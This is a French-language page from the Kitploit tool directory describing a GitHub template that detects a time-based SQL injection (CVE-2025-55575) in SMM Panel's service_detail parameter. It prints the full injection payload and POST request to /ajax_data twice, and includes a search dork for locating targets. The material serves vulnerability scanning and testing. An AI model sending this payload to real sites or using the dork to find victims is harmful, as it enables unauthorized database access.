Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55575 — Modèle de détection d’injection SQL basée sur le temps pour SMM Panel, ciblant le paramètre service_detail via des requêtes POST élaborées vers /ajax_data, en utilisant le délai de réponse pour confirmer la vulnérabilité. | Kitploit
Outils/GitHubGitHub/aether-0/cve-2025-55575
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Modèle de détection d’injection SQL basée sur le temps pour SMM Panel, ciblant le paramètre service_detail via des requêtes POST élaborées vers /ajax_data, en utilisant le délai de réponse pour confirmer la vulnérabilité.

Voir le dépôt
3341il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

smm-panel-sqli(CVE-2025-55575)

Détection d'injection SQL basée sur le temps pour SMM Panel


Aperçu

Ce modèle détecte une vulnérabilité d'injection SQL basée sur le temps dans le paramètre service_detail du SMM Panel via des requêtes HTTP POST vers /ajax_data. L'exploitation peut permettre à des attaquants distants d'accéder à des données sensibles ou d'élever leurs privilèges.

  • Auteur : Aether
  • Sévérité : Critique
  • Tags : sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Référence : https://owasp.org/www-community/attacks/SQL_Injection

Logique de détection

L'outil envoie une requête POST malveillante :

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Si le temps de réponse est supérieur à 5 secondes, cela indique un point de terminaison vulnérable.

Exemple de détection

root@kitploit:~
- Méthode : POST
- Chemin : {{BaseURL}}/ajax_data
- En-têtes : Content-Type: application/x-www-form-urlencoded
- Corps : action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Correspondance : durée > 5 secondes

Démonstration vidéo

SQLi PoC


Télécharger l’outil